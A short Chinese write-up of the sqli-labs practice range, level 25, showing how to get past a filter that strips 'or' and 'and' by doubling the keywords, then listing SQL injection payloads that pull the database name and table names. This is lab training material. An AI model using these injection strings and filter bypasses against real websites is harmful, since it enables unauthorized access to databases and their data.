sqli-labs靶场Less25

1.我们打开靶场看一下,发现这一关将我们之前用的or与and被过滤掉了

2.我们来尝试着来绕过一下,发现将and双写一下就可以绕过了

3.依次输入以下语句即可得到结果

复制代码
?id=1' oorrder by 2 --+
?id=-1'union select 1,database(),3 --+
?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema = 'security' --+   #其他命令和前面一样,注意将过滤的内容双写绕过
相关推荐
独行soc8 分钟前
2025年渗透测试面试题总结-67(题目+回答)
网络·python·安全·web安全·网络安全·adb·渗透测试
island13141 小时前
【Redis#9】其他数据结构
数据结构·数据库·redis
言之。1 小时前
Django REST框架:ModelViewSet全面解析
数据库·python·django
-Xie-1 小时前
Mysql杂志(十四)——Mysql逻辑架构
数据库·mysql·架构
西贝爱学习1 小时前
数据库系统概论的第六版与第五版的区别
数据库·oracle
emma羊羊3 小时前
【SQL注入】延时盲注
数据库·sql·网络安全
一叶飘零_sweeeet4 小时前
从 MySQL 到 TiDB:分布式数据库的无缝迁移与实战指南
数据库·mysql·tidb
axban4 小时前
QT M/V架构开发实战:QStandardItemModel介绍
开发语言·数据库·qt
没学上了4 小时前
数据库建立库-Qt
数据库
我是zxb4 小时前
EasyExcel:快速读写Excel的工具类
数据库·oracle·excel